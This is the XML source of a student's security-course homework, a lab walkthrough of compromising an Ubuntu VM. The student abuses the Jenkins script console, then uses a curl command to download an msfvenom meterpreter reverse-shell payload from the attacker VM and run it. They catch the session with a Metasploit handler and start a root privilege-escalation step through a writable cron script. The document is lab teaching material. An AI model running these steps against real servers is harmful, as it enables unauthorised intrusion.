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01201" w14:textId="0D66DE46" w:rsidR="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A238F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ENPM685 – Security Tools for Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69E25F" w14:textId="3A25B44F" w:rsidR="001A238F" w:rsidRPr="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A238F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Section: 0101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230CA1B" w14:textId="77777777" w:rsidR="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD93004" w14:textId="253447B3" w:rsidR="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A238F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Homework </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001A238F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B7794E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4C89E" w14:textId="17D6EE89" w:rsidR="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B89B2F8" w14:textId="179F43C5" w:rsidR="000C2786" w:rsidRDefault="000C2786" w:rsidP="001A238F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Name: Syed Mohammad Ibrahim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D68553" w14:textId="5959598E" w:rsidR="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UID: </w:t>
      </w:r>
      <w:r w:rsidRPr="001A238F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>iamibi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD7CF1" w14:textId="0F218398" w:rsidR="003C2A6A" w:rsidRPr="003C2A6A" w:rsidRDefault="003C2A6A" w:rsidP="001A238F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UID Number: </w:t>
      </w:r>
      <w:r w:rsidR="00B17638" w:rsidRPr="00B17638">
        <w:t>118428369</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618746A2" w14:textId="113A8A95" w:rsidR="001A238F" w:rsidRPr="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Email – </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="000E19E5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>iamibi@umd.edu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104AE03C" w14:textId="77777777" w:rsidR="001A238F" w:rsidRPr="001A238F" w:rsidRDefault="001A238F" w:rsidP="001A238F"/>
    <w:p w14:paraId="2CC8C4CA" w14:textId="61AF58B2" w:rsidR="001A238F" w:rsidRDefault="001A238F"/>
    <w:p w14:paraId="056D7FFA" w14:textId="0BA0F04C" w:rsidR="006D3820" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Final Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F3ED8" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRPr="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E"/>
    <w:p w14:paraId="5EA80077" w14:textId="078AB6E5" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="792A58D9" wp14:editId="49E5B015">
            <wp:extent cx="3208298" cy="38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3208298" cy="381033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F971B2C" w14:textId="02431C30" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E"/>
    <w:p w14:paraId="639D1F13" w14:textId="21DB6FB9" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59DB07" w14:textId="64349F0A" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E"/>
    <w:p w14:paraId="51C63A71" w14:textId="61115A59" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>I booted up the Kali and Ubuntu VMs. The Kali VM IP Address was 192.168.81.130 and the Ubuntu 20.04 VM IP Address was 192.168.81.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C404EF" w14:textId="3C172965" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>I ran the NMap command from the Kali VM to check the open ports on the Ubuntu VM. The output was</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B6DFC6" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>PORT     STATE SERVICE         VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3ADDC" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>21/tcp   open  ftp             vsftpd 3.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56219F5F" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EBE02B" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>80/tcp   open  http            Apache httpd 2.4.41 ((Ubuntu))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E03B79A" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>4505/tcp open  zmtp            ZeroMQ ZMTP 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA74A97" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>4506/tcp open  zmtp            ZeroMQ ZMTP 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE54CD0" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>8000/tcp open  ssl/http        CherryPy wsgiserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC085C0" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>8080/tcp open  http            Jetty 9.4.43.v20210629</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D80DCF" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>8089/tcp open  ssl/http        Splunkd httpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5996B017" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>8191/tcp open  limnerpressure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE3FCC" w14:textId="77777777" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>9000/tcp open  http            Splunkd httpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9BEE91" w14:textId="431215A1" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>1 service unrecognized despite returning data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB71115" w14:textId="0FC0FA02" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00B7794E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port 8080 was interesting as it was using Jenkins. Going on the web browser and executing </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="0062107F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.81.131:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> opened the Jenkins page. Jenkins allows shell commands to be executed on the host system it is running on using Gherkin scripts. I accessed the scripts page which had this ability by going to </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="0062107F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.81.131:8080/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003412D1">
        <w:t xml:space="preserve">. I executed the “id” command to verify whether it was working or not. The command was </w:t>
      </w:r>
      <w:r w:rsidR="003412D1" w:rsidRPr="003412D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>println new ProcessBuilder("id").redirectErrorStream(true).start().text</w:t>
      </w:r>
      <w:r w:rsidR="00170CC5">
        <w:t>. It gave the output on screen as Jenkins User.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3131C37C" w14:textId="7EE584BF" w:rsidR="00B7794E" w:rsidRDefault="00B7794E" w:rsidP="00170CC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For a getting in the Ubuntu system, we need a meterpreter/shell </w:t>
      </w:r>
      <w:r w:rsidR="003412D1">
        <w:t xml:space="preserve">to execute our own commands. To achieve that, I used msfvenom to generate an executable reverse TCP payload using the command </w:t>
      </w:r>
      <w:r w:rsidR="00170CC5" w:rsidRPr="00170CC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf LHOST=192.168.81.130 LPORT=4444 &gt; payload.elf</w:t>
      </w:r>
      <w:r w:rsidR="00170CC5">
        <w:t>. This generated an ELF file named “payload.elf” locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46228A86" w14:textId="11D350E2" w:rsidR="00170CC5" w:rsidRDefault="00170CC5" w:rsidP="00170CC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next task was to send this payload file to the victim machine. For that, I ran a simple http server in the directory where the payload was present using python 3 command </w:t>
      </w:r>
      <w:r w:rsidRPr="00170CC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>python3 -m http.server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This allowed my local directory to act as root for accessing files present there. On Jenkins script, I executed the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00170CC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>println new ProcessBuilder("curl", "http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.81.130</w:t>
      </w:r>
      <w:r w:rsidRPr="00170CC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:8000/payload.elf", "--output", "/tmp/payload.elf").redirectErrorStream(true).start().text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC208F">
        <w:t xml:space="preserve">on Jenkins script window </w:t>
      </w:r>
      <w:r>
        <w:t>which in turn downloaded the payload.elf file in the victim’s system at location /tmp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2B68E" w14:textId="70C00D7E" w:rsidR="00F87AE1" w:rsidRDefault="00F87AE1" w:rsidP="00F87AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE4EEF6" w14:textId="3F175FCD" w:rsidR="00F87AE1" w:rsidRDefault="00F87AE1" w:rsidP="000D0ED5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7040BEFF" wp14:editId="64F07EEB">
            <wp:extent cx="5943600" cy="261556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0CEF7F9E" w14:textId="77777777" w:rsidR="00F87AE1" w:rsidRDefault="00F87AE1" w:rsidP="00F87AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1660AE79" w14:textId="6CEEAE21" w:rsidR="00170CC5" w:rsidRDefault="00170CC5" w:rsidP="00170CC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The file is currently not executable as Ubuntu permissions are not set correctly for the file. Thus, I execute the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00170CC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>println new ProcessBuilder("chmod", "+x", "/tmp/payload.elf").redirectErrorStream(true).start().text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC208F">
        <w:t xml:space="preserve">on Jenkins script window </w:t>
      </w:r>
      <w:r>
        <w:t>which added the execute permission to the payload.elf file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B69197C" w14:textId="3A7A4B19" w:rsidR="00170CC5" w:rsidRDefault="00170CC5" w:rsidP="00170CC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Before executing the payload file, I needed to run the reverse TCP handler which will be listening at port 4444 of the Kali VM. To do that, I ran the Metasploit framework and ex</w:t>
      </w:r>
      <w:r w:rsidR="00EC208F">
        <w:t>ecuted the following commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB85AB" w14:textId="0B2C4ADC" w:rsidR="00EC208F" w:rsidRPr="00AA46D1" w:rsidRDefault="00EC208F" w:rsidP="00EC208F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA46D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A03F1FF" w14:textId="29B2E67A" w:rsidR="00EC208F" w:rsidRPr="00AA46D1" w:rsidRDefault="00EC208F" w:rsidP="00EC208F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA46D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; set payload linux/x64/meterpreter/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467ADA9" w14:textId="52530545" w:rsidR="00EC208F" w:rsidRPr="00AA46D1" w:rsidRDefault="00EC208F" w:rsidP="00EC208F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA46D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&gt; set LHOST 192.168.81.130 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FBEC0" w14:textId="5F9BD9BF" w:rsidR="00EC208F" w:rsidRDefault="00EC208F" w:rsidP="00EC208F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA46D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5154BA42" w14:textId="4F05141B" w:rsidR="00EC208F" w:rsidRDefault="00EC208F" w:rsidP="0019635A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This initialized the handler and was waiting for receiving a TCP signal from the victim’s machine. I executed the command </w:t>
      </w:r>
      <w:r w:rsidR="0019635A" w:rsidRPr="0019635A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>println new ProcessBuilder("/tmp/payload.elf").redirectErrorStream(true).start().text</w:t>
      </w:r>
      <w:r w:rsidR="0019635A">
        <w:t xml:space="preserve"> on Jenkins script window which made the Jenkins browser window go into loading mode and on the Metasploit terminal I got the meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E13E08" w14:textId="3003F2FF" w:rsidR="00F87AE1" w:rsidRDefault="00F87AE1" w:rsidP="00F87AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228DED97" w14:textId="74F12377" w:rsidR="00F87AE1" w:rsidRDefault="00F87AE1" w:rsidP="00F87AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61EA8D1B" wp14:editId="4D38A9B5">
            <wp:extent cx="5943600" cy="256095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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E085078" w14:textId="77777777" w:rsidR="00F87AE1" w:rsidRDefault="00F87AE1" w:rsidP="00F87AE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75204DC9" w14:textId="1F5339B4" w:rsidR="00AA46D1" w:rsidRDefault="00AA46D1" w:rsidP="00AA46D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56D96610" wp14:editId="6504B9AB">
            <wp:extent cx="5943600" cy="1729740"/>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5A4DDAB6" w14:textId="7D7E0BE3" w:rsidR="00AA46D1" w:rsidRDefault="007F7E88" w:rsidP="0019635A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I used the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F7E88">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meterpreter command to spawn a shell on the victim machine.</w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:t xml:space="preserve"> Running the </w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:t xml:space="preserve"> command showed that I was a Jenkins user. There were three users present in /home directory. Namely </w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>brute</w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="003872DD" w:rsidRPr="003872DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enpm685</w:t>
      </w:r>
      <w:r w:rsidR="003872DD">
        <w:t xml:space="preserve">. I didn’t had password for either of them. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679AF534" w14:textId="3EBDC1E7" w:rsidR="003872DD" w:rsidRDefault="003872DD" w:rsidP="003872DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C497FB" w14:textId="6E925C7D" w:rsidR="003872DD" w:rsidRDefault="003872DD" w:rsidP="003872DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FF32C1B" wp14:editId="2E29C350">
            <wp:extent cx="5943600" cy="16764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19341107" w14:textId="157B982C" w:rsidR="003872DD" w:rsidRDefault="003872DD" w:rsidP="0019635A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Going over few of the other files </w:t>
      </w:r>
      <w:r w:rsidR="00424D16">
        <w:t xml:space="preserve">and directories, I found that there is a file called </w:t>
      </w:r>
      <w:r w:rsidR="00424D16" w:rsidRPr="00424D16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r w:rsidR="00424D16">
        <w:t xml:space="preserve"> which was running a file with root privileges. The file was </w:t>
      </w:r>
      <w:r w:rsidR="00424D16" w:rsidRPr="00424D16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dosomething.sh</w:t>
      </w:r>
      <w:r w:rsidR="00424D16">
        <w:t xml:space="preserve">. Going over the contents of the file, it was performing a sleep operation of 10 seconds and it had a comment saying </w:t>
      </w:r>
      <w:r w:rsidR="00424D16" w:rsidRPr="00424D16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>still setting this up. – admin</w:t>
      </w:r>
      <w:r w:rsidR="00424D16">
        <w:t>. I checked the permission of this file and anyone on the system can read, write or execute the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F58DB58" w14:textId="4EE39270" w:rsidR="00424D16" w:rsidRDefault="00424D16" w:rsidP="00424D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B75B9DE" w14:textId="3E474E69" w:rsidR="00424D16" w:rsidRDefault="00424D16" w:rsidP="00424D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5097D654" wp14:editId="71E4E737">
            <wp:extent cx="5943600" cy="315404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4348650C" w14:textId="6496EB1B" w:rsidR="00424D16" w:rsidRDefault="00424D16" w:rsidP="0019635A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To gain privileges, I will use this file in complementary with another exploit. I wrote a C program which sets the current user’s UID and GID to 0, which is of root user and starts up the shell. The program is written and compiled on the Kali VM for x86_64 machine. The program name is </w:t>
      </w:r>
      <w:r w:rsidRPr="00424D16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit_root.c</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F88EE88" w14:textId="1333874A" w:rsidR="00424D16" w:rsidRDefault="00424D16" w:rsidP="00424D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD9D7FB" w14:textId="0DC948AE" w:rsidR="00424D16" w:rsidRDefault="00424D16" w:rsidP="00424D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3280F4CC" wp14:editId="0F3C0CF2">
            <wp:extent cx="5937885" cy="214439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144395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
